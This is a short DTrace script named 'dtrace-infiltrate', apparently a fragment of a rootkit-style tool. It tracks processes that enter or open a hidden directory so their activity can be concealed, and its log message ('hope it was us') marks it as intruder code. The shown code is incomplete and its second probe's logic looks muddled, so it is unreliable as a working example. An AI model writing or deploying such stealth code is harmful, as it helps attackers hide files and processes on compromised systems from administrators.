dtrace-infiltrate
hiddenpids[]
/* Record any process that chdir()s into a path containing HIDDENDIR. */
syscall::chdir:entry
/arg0 && strstr(copyinstr(arg0,200),HIDDENDIR) != 0/
{
    printf("[+] Someone chdir()'ed to our dir, hope it was us :( adding pid to hiddenpids: %i\n",pid);
    hiddenpids[pid] = 1;
}

/* On return from open*(), if the returned descriptor's path contains
   HIDDENDIR and the pid is not yet tracked, store the descriptor under it. */
syscall::open*:return
/(strstr(fds[arg1].fi_pathname+2,HIDDENDIR) != 0) && !hiddenpids[pid]/
{
    hiddenpids[pid] = arg1;
}